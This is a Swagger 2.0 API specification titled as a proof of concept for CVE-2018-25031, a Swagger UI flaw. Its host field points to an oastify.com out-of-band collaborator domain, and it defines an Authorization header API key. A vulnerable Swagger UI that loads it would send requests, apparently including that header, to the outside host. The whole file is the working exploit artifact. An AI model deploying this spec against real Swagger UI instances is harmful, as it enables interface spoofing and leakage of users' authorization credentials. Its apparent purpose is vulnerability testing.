swagger: '2.0'
info:
  version: 1.0.0
  title: POC CVE-2018-25031
  description: A simple POC CVE-2018-25031
schemes: 
- https
host: m7u35zcez6kyi4fvvvl06zp4ivomcc01.oastify.com
basePath: /v1
securityDefinitions:
  UserSecurity:
    type: apiKey
    name: Authorization
    in: header
security:
  - UserSecurity: [] 
paths:
  /dados/:
    #  ----- Added lines  ----------------------------------------
    get:
      description: Lets a user post a new data
                
      responses:
        200:
          description: Successfully
          
        400:
          description: Invalid request
              
  
    #  ---- /Added lines  ----------------------------------------